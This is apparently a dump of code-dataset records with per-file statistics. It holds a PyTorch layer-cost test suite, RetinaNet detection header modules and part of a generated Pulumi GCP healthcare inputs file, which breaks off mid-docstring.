ensemble mean is the predictor. 
""" initial_guess = np.array([0, 1, 5000, 1], dtype=np.float64) predictor = "mean" distribution = "truncnorm" plugin = Plugin(tolerance=self.tolerance, max_iterations=5) plugin.process( initial_guess, self.forecast_predictor_mean, self.truth, self.forecast_variance, predictor, distribution, ) warning_msg_min = "Minimisation did not result in convergence after" warning_msg_iter = "The final iteration resulted in a percentage " self.assertTrue(any(item.category == UserWarning for item in warning_list)) self.assertTrue(any(warning_msg_min in str(item) for item in warning_list)) self.assertTrue(any(warning_msg_iter in str(item) for item in warning_list)) if __name__ == "__main__": unittest.main()
36.299189
90
0.618535
3,764
35,791
5.730871
0.10813
0.033378
0.031153
0.031338
0.869825
0.85462
0.843586
0.828103
0.815493
0.812433
0
0.030987
0.303009
35,791
985
91
36.336041
0.833721
0.213434
0
0.737681
0
0
0.10389
0
0
0
0
0
0.063768
1
0.043478
false
0
0.011594
0
0.065217
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
c797eb10101d990b77e7bb5e6c57289ea5dcbdff
11,929
py
Python
test/test_modules.py
frgfm/torch-scan
61116d92e35a8c65e7d9f46c6f88939d04c11cfe
[ "Apache-2.0" ]
91
2020-03-17T00:25:45.000Z
2022-03-12T13:42:53.000Z
test/test_modules.py
frgfm/torch-scan
61116d92e35a8c65e7d9f46c6f88939d04c11cfe
[ "Apache-2.0" ]
37
2020-03-17T01:39:19.000Z
2021-07-13T09:17:14.000Z
test/test_modules.py
frgfm/torch-scan
61116d92e35a8c65e7d9f46c6f88939d04c11cfe
[ "Apache-2.0" ]
9
2020-04-24T10:42:33.000Z
2021-12-29T11:49:42.000Z
# Copyright (C) 2020-2021, François-Guillaume Fernandez.
# This program is licensed under the Apache License version 2.
# See LICENSE or go to <https://www.apache.org/licenses/LICENSE-2.0.txt> for full license details.

import unittest

import torch
from torch import nn

from torchscan import modules


class MyModule(nn.Module):
    """Bare module with no recognized op, used to exercise the fallback path."""

    def __init__(self):
        super().__init__()


class Tester(unittest.TestCase):
    @torch.no_grad()
    def test_module_flops(self):
        """FLOP estimation for common layer types."""
        # Unknown modules fall back to 0 and emit a warning
        self.assertEqual(modules.module_flops(MyModule(), None, None), 0)
        self.assertWarns(UserWarning, modules.module_flops, MyModule(), None, None)

        vec = torch.zeros((1, 8))

        # Fully-connected, with and without bias
        self.assertEqual(
            modules.module_flops(nn.Linear(8, 4), (vec,), torch.zeros((1, 4))),
            4 * (2 * 8 - 1) + 4,
        )
        self.assertEqual(
            modules.module_flops(nn.Linear(8, 4, bias=False), (vec,), torch.zeros((1, 4))),
            4 * (2 * 8 - 1),
        )

        # Activations (expected FLOPs per 8-element input)
        activation_cases = [
            (nn.Identity(), 0),
            (nn.Flatten(), 0),
            (nn.ReLU(), 8),
            (nn.ELU(), 48),
            (nn.LeakyReLU(), 32),
            (nn.ReLU6(), 16),
            (nn.Tanh(), 48),
            (nn.Sigmoid(), 32),
        ]
        for act, expected in activation_cases:
            self.assertEqual(
                modules.module_flops(act, (vec,), torch.zeros((1, 8))), expected
            )

        # BN
        self.assertEqual(
            modules.module_flops(
                nn.BatchNorm1d(8), (torch.zeros((1, 8, 4)),), torch.zeros((1, 8, 4))
            ),
            144 + 32 + 32 * 3 + 48,
        )

        # Pooling (both tuple and single-integer output sizes)
        pool_in = torch.zeros((1, 8, 4, 4))
        pool_out = torch.zeros((1, 8, 2, 2))
        pooling_cases = [
            (nn.MaxPool2d((2, 2)), 3 * 32),
            (nn.AvgPool2d((2, 2)), 5 * 32),
            (nn.AdaptiveMaxPool2d((2, 2)), 3 * 32),
            (nn.AdaptiveMaxPool2d(2), 3 * 32),
            (nn.AdaptiveAvgPool2d((2, 2)), 5 * 32),
            (nn.AdaptiveAvgPool2d(2), 5 * 32),
        ]
        for pool, expected in pooling_cases:
            self.assertEqual(modules.module_flops(pool, (pool_in,), pool_out), expected)

        # Dropout
        self.assertEqual(modules.module_flops(nn.Dropout(), (vec,), torch.zeros((1, 8))), 8)
        self.assertEqual(modules.module_flops(nn.Dropout(p=0), (vec,), torch.zeros((1, 8))), 0)

        # Conv
        x = torch.rand((1, 3, 32, 32))
        layer = nn.Conv2d(3, 8, 3)
        self.assertEqual(modules.module_flops(layer, (x,), layer(x)), 388800)

        # ConvTranspose
        layer = nn.ConvTranspose2d(3, 8, 3)
        self.assertEqual(modules.module_flops(layer, (x,), layer(x)), 499408)

        # Transformer
        layer = nn.Transformer(nhead=4, num_encoder_layers=3)
        src = torch.rand((10, 32, 512))
        tgt = torch.rand((20, 32, 512))
        self.assertEqual(
            modules.module_flops(layer, (src, tgt), layer(src, tgt)), 1916295945
        )

    @torch.no_grad()
    def test_module_macs(self):
        """MAC estimation for common layer types."""
        # Unknown modules fall back to 0 and emit a warning
        self.assertEqual(modules.module_macs(MyModule(), None, None), 0)
        self.assertWarns(UserWarning, modules.module_macs, MyModule(), None, None)

        # Linear
        self.assertEqual(
            modules.module_macs(nn.Linear(8, 4), torch.zeros((1, 8)), torch.zeros((1, 4))),
            8 * 4,
        )

        # Activations carry no multiply-accumulates
        self.assertEqual(modules.module_macs(nn.ReLU(), None, None), 0)

        # Conv
        x = torch.rand((1, 3, 32, 32))
        layer = nn.Conv2d(3, 8, 3)
        self.assertEqual(modules.module_macs(layer, x, layer(x)), 194400)

        # ConvTranspose
        layer = nn.ConvTranspose2d(3, 8, 3)
        self.assertEqual(modules.module_macs(layer, x, layer(x)), 249704)

        # BN
        self.assertEqual(
            modules.module_macs(
                nn.BatchNorm1d(8), torch.zeros((1, 8, 4)), torch.zeros((1, 8, 4))
            ),
            64 + 24 + 56 + 32,
        )

        # Pooling (both tuple and single-integer output sizes)
        pool_in = torch.zeros((1, 8, 4, 4))
        pool_out = torch.zeros((1, 8, 2, 2))
        pooling_cases = [
            (nn.MaxPool2d((2, 2)), 3 * 32),
            (nn.AvgPool2d((2, 2)), 5 * 32),
            (nn.AdaptiveMaxPool2d((2, 2)), 3 * 32),
            (nn.AdaptiveAvgPool2d((2, 2)), 5 * 32),
            (nn.AdaptiveMaxPool2d(2), 3 * 32),
            (nn.AdaptiveAvgPool2d(2), 5 * 32),
        ]
        for pool, expected in pooling_cases:
            self.assertEqual(modules.module_macs(pool, pool_in, pool_out), expected)

        # Dropout
        self.assertEqual(
            modules.module_macs(nn.Dropout(), torch.zeros((1, 8)), torch.zeros((1, 8))), 0
        )

    @torch.no_grad()
    def test_module_dmas(self):
        """DMA (memory access) estimation for common layer types."""
        # Unknown modules fall back to 0 and emit a warning
        self.assertEqual(modules.module_dmas(MyModule(), None, None), 0)
        self.assertWarns(UserWarning, modules.module_dmas, MyModule(), None, None)

        vec = torch.zeros((1, 8))

        # Linear
        self.assertEqual(
            modules.module_dmas(nn.Linear(8, 4), vec, torch.zeros((1, 4))),
            4 * (8 + 1) + 8 + 4,
        )

        # Activations
        self.assertEqual(modules.module_dmas(nn.Identity(), vec, torch.zeros((1, 8))), 8)
        self.assertEqual(modules.module_dmas(nn.Flatten(), vec, torch.zeros((1, 8))), 16)
        self.assertEqual(modules.module_dmas(nn.ReLU(), vec, torch.zeros((1, 8))), 8 * 2)
        # In-place variant has no separate output tensor
        self.assertEqual(modules.module_dmas(nn.ReLU(inplace=True), vec, None), 8)
        self.assertEqual(modules.module_dmas(nn.ELU(), vec, torch.zeros((1, 8))), 17)
        self.assertEqual(modules.module_dmas(nn.Sigmoid(), vec, torch.zeros((1, 8))), 16)
        self.assertEqual(modules.module_dmas(nn.Tanh(), vec, torch.zeros((1, 8))), 24)

        # Conv
        x = torch.rand((1, 3, 32, 32))
        layer = nn.Conv2d(3, 8, 3)
        self.assertEqual(modules.module_dmas(layer, x, layer(x)), 201824)

        # ConvTranspose
        layer = nn.ConvTranspose2d(3, 8, 3)
        self.assertEqual(modules.module_dmas(layer, x, layer(x)), 259178)

        # BN
        self.assertEqual(
            modules.module_dmas(
                nn.BatchNorm1d(8), torch.zeros((1, 8, 4)), torch.zeros((1, 8, 4))
            ),
            32 + 17 + 1 + 16 + 17 + 32,
        )

        # Pooling (both tuple and single-integer output sizes)
        pool_in = torch.zeros((1, 8, 4, 4))
        pool_out = torch.zeros((1, 8, 2, 2))
        for pool in (
            nn.MaxPool2d((2, 2)),
            nn.AdaptiveMaxPool2d((2, 2)),
            nn.MaxPool2d(2),
            nn.AdaptiveMaxPool2d(2),
        ):
            self.assertEqual(modules.module_dmas(pool, pool_in, pool_out), 4 * 32 + 32)

        # Dropout
        self.assertEqual(modules.module_dmas(nn.Dropout(), vec, torch.zeros((1, 8))), 17)

    @torch.no_grad()
    def test_module_rf(self):
        """Receptive-field (field, stride, padding) estimation."""
        # Unknown modules fall back to the neutral value and emit a warning
        self.assertEqual(modules.module_rf(MyModule(), None, None), (1, 1, 0))
        self.assertWarns(UserWarning, modules.module_rf, MyModule(), None, None)

        vec = torch.zeros((1, 8))

        # Pointwise layers leave the receptive field unchanged
        self.assertEqual(
            modules.module_rf(nn.Linear(8, 4), vec, torch.zeros((1, 4))), (1, 1, 0)
        )
        for act in (nn.Identity(), nn.Flatten(), nn.ReLU(), nn.ELU(), nn.Sigmoid(), nn.Tanh()):
            self.assertEqual(modules.module_rf(act, vec, torch.zeros((1, 8))), (1, 1, 0))

        # Conv
        x = torch.rand((1, 3, 32, 32))
        layer = nn.Conv2d(3, 8, 3)
        self.assertEqual(modules.module_rf(layer, x, layer(x)), (3, 1, 0))
        # Dilation widens the field
        layer = nn.Conv2d(3, 8, 3, dilation=2)
        self.assertEqual(modules.module_rf(layer, x, layer(x)), (5, 1, 0))

        # ConvTranspose
        layer = nn.ConvTranspose2d(3, 8, 3)
        self.assertEqual(modules.module_rf(layer, x, layer(x)), (-3, 1, 0))

        # BN
        self.assertEqual(
            modules.module_rf(
                nn.BatchNorm1d(8), torch.zeros((1, 8, 4)), torch.zeros((1, 8, 4))
            ),
            (1, 1, 0),
        )

        # Pooling
        pool_in = torch.zeros((1, 8, 4, 4))
        pool_out = torch.zeros((1, 8, 2, 2))
        self.assertEqual(modules.module_rf(nn.MaxPool2d((2, 2)), pool_in, pool_out), (2, 2, 0))
        self.assertEqual(
            modules.module_rf(nn.AdaptiveMaxPool2d((2, 2)), pool_in, pool_out), (2, 2, 0)
        )

        # Dropout
        self.assertEqual(modules.module_rf(nn.Dropout(), vec, torch.zeros((1, 8))), (1, 1, 0))


if __name__ == '__main__':
    unittest.main()
52.783186
120
0.537597
1,573
11,929
3.998093
0.090273
0.166958
0.183654
0.190809
0.898076
0.885514
0.758944
0.734775
0.708698
0.660836
0
0.080285
0.294157
11,929
225
121
53.017778
0.666627
0.079722
0
0.357616
0
0
0.000732
0
0
0
0
0
0.476821
1
0.033113
false
0
0.02649
0
0.072848
0
0
0
0
null
0
1
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
9
c7d8a82bfa50897bc43eef3bf3104e26168b13b1
10,062
py
Python
src/retina_net/models/multitask_headers.py
asharakeh/bayes-od-rc
3f478e5c9a593ee03d7b63d533d46d87d739fc26
[ "MIT" ]
30
2019-09-17T22:37:34.000Z
2022-01-17T14:34:42.000Z
src/retina_net/models/multitask_headers.py
asharakeh/bayes-od-rc
3f478e5c9a593ee03d7b63d533d46d87d739fc26
[ "MIT" ]
4
2019-10-07T23:05:46.000Z
2020-11-26T16:24:28.000Z
src/retina_net/models/multitask_headers.py
asharakeh/bayes-od-rc
3f478e5c9a593ee03d7b63d533d46d87d739fc26
[ "MIT" ]
5
2019-09-17T22:37:36.000Z
2022-02-16T13:33:24.000Z
import numpy as np
import tensorflow as tf

keras = tf.keras

# Filter count shared by every intermediate conv layer of every header.
_TOWER_FILTERS = 256


def _build_tower(name_prefix, dropout_rate, l2_norm_rate):
    """Build the 4x (3x3 Conv2D + Dropout) tower shared by all headers.

    Returns a flat tuple ``(conv_1, drop_1, conv_2, drop_2, conv_3, drop_3,
    conv_4, drop_4)`` so callers can keep the original per-attribute layer
    layout (layer names and attribute names are unchanged for checkpoint
    compatibility).

    Args:
        name_prefix: Conv layer name prefix, e.g. 'pyramid_classification'
            (layers are named ``<prefix>_0`` .. ``<prefix>_3``).
        dropout_rate: Rate for the Dropout layers ('drop1' .. 'drop4').
        l2_norm_rate: L2 kernel-regularization factor for the conv layers.
    """
    layers = []
    for i in range(4):
        layers.append(keras.layers.Conv2D(
            _TOWER_FILTERS, (3, 3),
            strides=(1, 1),
            padding='same',
            kernel_initializer='he_normal',
            name='{}_{}'.format(name_prefix, i),
            kernel_regularizer=keras.regularizers.l2(l2_norm_rate)))
        layers.append(keras.layers.Dropout(
            name='drop{}'.format(i + 1),
            rate=dropout_rate))
    return tuple(layers)


def _apply_tower(x, relu, pairs, training):
    """Run ``x`` through (conv, dropout) pairs with ReLU between them.

    ``training`` is forwarded to each Dropout call so Monte-Carlo dropout can
    be forced on at inference time.
    """
    for conv, drop in pairs:
        x = conv(x)
        x = relu(x)
        x = drop(x, training=training)
    return x


class ClsHeader(keras.Model):
    """Per-anchor classification header of the detection network.

    Emits ``num_classes + 1`` logits (the extra slot is presumably the
    background class — TODO confirm against the loss code) per anchor.
    """

    def __init__(self, header_config):
        super().__init__()

        self.anchors_per_location = header_config['anchors_per_location']
        self.num_classes = header_config['num_classes']
        dropout_rate = header_config['dropout_rate']
        l2_norm_rate = header_config['l2_norm_rate']

        # Classification tower (naming convention compatible with fizyr
        # keras-retinanet).
        (self.conv_1, self.drop_1,
         self.conv_2, self.drop_2,
         self.conv_3, self.drop_3,
         self.conv_4, self.drop_4) = _build_tower(
            'pyramid_classification', dropout_rate, l2_norm_rate)

        # RetinaNet-style prior: bias all but the last logit so the initial
        # per-class probability is ~0.01; the last slot keeps a zero bias.
        cls_bias_initializer = np.zeros(self.num_classes + 1)
        cls_bias_initializer[:-1] = -np.log((1.0 - 0.01) / 0.01)
        cls_bias_initializer = np.tile(
            cls_bias_initializer, self.anchors_per_location)

        self.cls_out = keras.layers.Conv2D(
            self.anchors_per_location * (self.num_classes + 1),
            (1, 1),
            strides=(1, 1),
            padding='same',
            kernel_initializer='he_normal',
            bias_initializer=keras.initializers.constant(cls_bias_initializer),
            name='pyramid_classification')

        self.relu = keras.layers.ReLU()

    def call(self, input_tensor, mc_dropout_enabled):
        """Return logits of shape [batch, anchors_per_location * H * W, C+1].

        ``mc_dropout_enabled`` forces the dropout layers on, enabling
        Monte-Carlo dropout sampling at inference time.
        """
        num_input_pixels = tf.shape(input_tensor)[1] * tf.shape(input_tensor)[2]

        x = _apply_tower(
            input_tensor, self.relu,
            [(self.conv_1, self.drop_1),
             (self.conv_2, self.drop_2),
             (self.conv_3, self.drop_3),
             (self.conv_4, self.drop_4)],
            mc_dropout_enabled)

        cls_out = self.cls_out(x)
        cls_out = tf.reshape(
            cls_out,
            [-1,
             self.anchors_per_location * num_input_pixels,
             self.num_classes + 1])
        return cls_out


class RegHeader(keras.Model):
    """Per-anchor box-regression header (4 offsets per anchor)."""

    def __init__(self, header_config):
        super().__init__()

        self.anchors_per_location = header_config['anchors_per_location']
        dropout_rate = header_config['dropout_rate']
        l2_norm_rate = header_config['l2_norm_rate']

        # Regression tower.
        # NOTE(review): conv_4/drop_4 are created here but never applied in
        # call() below — only three (conv, dropout) pairs run. Preserved
        # as-is to keep behavior and checkpoint variable layout; confirm
        # whether the fourth pair was meant to be used.
        (self.conv_1, self.drop_1,
         self.conv_2, self.drop_2,
         self.conv_3, self.drop_3,
         self.conv_4, self.drop_4) = _build_tower(
            'pyramid_regression', dropout_rate, l2_norm_rate)

        self.reg_out = keras.layers.Conv2D(
            self.anchors_per_location * 4,
            (1, 1),
            strides=(1, 1),
            padding='same',
            kernel_initializer='he_normal',
            name='pyramid_regression')

        self.relu = keras.layers.ReLU()

    def call(self, input_tensor, mc_dropout_enabled):
        """Return box offsets of shape [batch, anchors_per_location * H * W, 4]."""
        num_input_pixels = tf.shape(input_tensor)[1] * tf.shape(input_tensor)[2]

        # Only three tower stages run here (see NOTE in __init__).
        x = _apply_tower(
            input_tensor, self.relu,
            [(self.conv_1, self.drop_1),
             (self.conv_2, self.drop_2),
             (self.conv_3, self.drop_3)],
            mc_dropout_enabled)

        reg_out = self.reg_out(x)
        reg_out = tf.reshape(
            reg_out,
            [-1, self.anchors_per_location * num_input_pixels, 4])
        return reg_out


class CovHeader(keras.Model):
    """Per-anchor covariance header for probabilistic box regression."""

    def __init__(self, header_config):
        super().__init__()

        self.anchors_per_location = header_config['anchors_per_location']
        dropout_rate = header_config['dropout_rate']
        l2_norm_rate = header_config['l2_norm_rate']

        # Covariance tower.
        (self.conv_1, self.drop_1,
         self.conv_2, self.drop_2,
         self.conv_3, self.drop_3,
         self.conv_4, self.drop_4) = _build_tower(
            'pyramid_cov', dropout_rate, l2_norm_rate)

        # Number of elements required to describe an NxN covariance matrix is
        # computed as: (N * (N + 1)) / 2 — here N = 4 box parameters -> 10.
        # Near-zero init keeps the predicted covariance tiny at the start.
        cov_init = keras.initializers.TruncatedNormal(mean=0.0, stddev=1e-6)
        self.cov_out = keras.layers.Conv2D(
            self.anchors_per_location * 10,
            (1, 1),
            strides=(1, 1),
            padding='same',
            kernel_initializer=cov_init,
            kernel_regularizer=keras.regularizers.l2(l2_norm_rate),
            name='pyramid_cov')

        self.relu = keras.layers.ReLU()

    def call(self, input_tensor, mc_dropout_enabled):
        """Return covariance terms of shape [batch, anchors_per_location * H * W, 10]."""
        num_input_pixels = tf.shape(input_tensor)[1] * tf.shape(input_tensor)[2]

        x = _apply_tower(
            input_tensor, self.relu,
            [(self.conv_1, self.drop_1),
             (self.conv_2, self.drop_2),
             (self.conv_3, self.drop_3),
             (self.conv_4, self.drop_4)],
            mc_dropout_enabled)

        cov_out = self.cov_out(x)
        cov_out = tf.reshape(
            cov_out,
            [-1, self.anchors_per_location * num_input_pixels, 10])
        return cov_out
29.335277
85
0.535579
1,140
10,062
4.444737
0.089474
0.032564
0.037498
0.047365
0.851983
0.846852
0.841326
0.841326
0.784883
0.753503
0
0.038175
0.359571
10,062
342
86
29.421053
0.748138
0.021368
0
0.79562
0
0
0.067886
0.011992
0
0
0
0
0
1
0.021898
false
0
0.007299
0
0.051095
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
400269ea0378e92fb0efe3079d3b46b1deaa1a8b
36,785
py
Python
sdk/python/pulumi_gcp/healthcare/_inputs.py
sisisin/pulumi-gcp
af6681d70ea457843409110c1324817fe55f68ad
[ "ECL-2.0", "Apache-2.0" ]
121
2018-06-18T19:16:42.000Z
2022-03-31T06:06:48.000Z
sdk/python/pulumi_gcp/healthcare/_inputs.py
sisisin/pulumi-gcp
af6681d70ea457843409110c1324817fe55f68ad
[ "ECL-2.0", "Apache-2.0" ]
492
2018-06-22T19:41:03.000Z
2022-03-31T15:33:53.000Z
sdk/python/pulumi_gcp/healthcare/_inputs.py
sisisin/pulumi-gcp
af6681d70ea457843409110c1324817fe55f68ad
[ "ECL-2.0", "Apache-2.0" ]
43
2018-06-19T01:43:13.000Z
2022-03-23T22:43:37.000Z
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = [ 'ConsentStoreIamBindingConditionArgs', 'ConsentStoreIamMemberConditionArgs', 'DatasetIamBindingConditionArgs', 'DatasetIamMemberConditionArgs', 'DicomStoreIamBindingConditionArgs', 'DicomStoreIamMemberConditionArgs', 'DicomStoreNotificationConfigArgs', 'DicomStoreStreamConfigArgs', 'DicomStoreStreamConfigBigqueryDestinationArgs', 'FhirStoreIamBindingConditionArgs', 'FhirStoreIamMemberConditionArgs', 'FhirStoreNotificationConfigArgs', 'FhirStoreStreamConfigArgs', 'FhirStoreStreamConfigBigqueryDestinationArgs', 'FhirStoreStreamConfigBigqueryDestinationSchemaConfigArgs', 'Hl7StoreIamBindingConditionArgs', 'Hl7StoreIamMemberConditionArgs', 'Hl7StoreNotificationConfigArgs', 'Hl7StoreNotificationConfigsArgs', 'Hl7StoreParserConfigArgs', ] @pulumi.input_type class ConsentStoreIamBindingConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, 
value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class ConsentStoreIamMemberConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class DatasetIamBindingConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: 
Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class DatasetIamMemberConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class DicomStoreIamBindingConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): 
pulumi.set(self, "description", value) @pulumi.input_type class DicomStoreIamMemberConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class DicomStoreNotificationConfigArgs: def __init__(__self__, *, pubsub_topic: pulumi.Input[str]): """ :param pulumi.Input[str] pubsub_topic: The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. 
""" pulumi.set(__self__, "pubsub_topic", pubsub_topic) @property @pulumi.getter(name="pubsubTopic") def pubsub_topic(self) -> pulumi.Input[str]: """ The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. """ return pulumi.get(self, "pubsub_topic") @pubsub_topic.setter def pubsub_topic(self, value: pulumi.Input[str]): pulumi.set(self, "pubsub_topic", value) @pulumi.input_type class DicomStoreStreamConfigArgs: def __init__(__self__, *, bigquery_destination: pulumi.Input['DicomStoreStreamConfigBigqueryDestinationArgs']): """ :param pulumi.Input['DicomStoreStreamConfigBigqueryDestinationArgs'] bigquery_destination: BigQueryDestination to include a fully qualified BigQuery table URI where DICOM instance metadata will be streamed. Structure is documented below. """ pulumi.set(__self__, "bigquery_destination", bigquery_destination) @property @pulumi.getter(name="bigqueryDestination") def bigquery_destination(self) -> pulumi.Input['DicomStoreStreamConfigBigqueryDestinationArgs']: """ BigQueryDestination to include a fully qualified BigQuery table URI where DICOM instance metadata will be streamed. Structure is documented below. 
""" return pulumi.get(self, "bigquery_destination") @bigquery_destination.setter def bigquery_destination(self, value: pulumi.Input['DicomStoreStreamConfigBigqueryDestinationArgs']): pulumi.set(self, "bigquery_destination", value) @pulumi.input_type class DicomStoreStreamConfigBigqueryDestinationArgs: def __init__(__self__, *, table_uri: pulumi.Input[str]): """ :param pulumi.Input[str] table_uri: a fully qualified BigQuery table URI where DICOM instance metadata will be streamed. """ pulumi.set(__self__, "table_uri", table_uri) @property @pulumi.getter(name="tableUri") def table_uri(self) -> pulumi.Input[str]: """ a fully qualified BigQuery table URI where DICOM instance metadata will be streamed. """ return pulumi.get(self, "table_uri") @table_uri.setter def table_uri(self, value: pulumi.Input[str]): pulumi.set(self, "table_uri", value) @pulumi.input_type class FhirStoreIamBindingConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class FhirStoreIamMemberConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: 
Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class FhirStoreNotificationConfigArgs: def __init__(__self__, *, pubsub_topic: pulumi.Input[str]): """ :param pulumi.Input[str] pubsub_topic: The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if 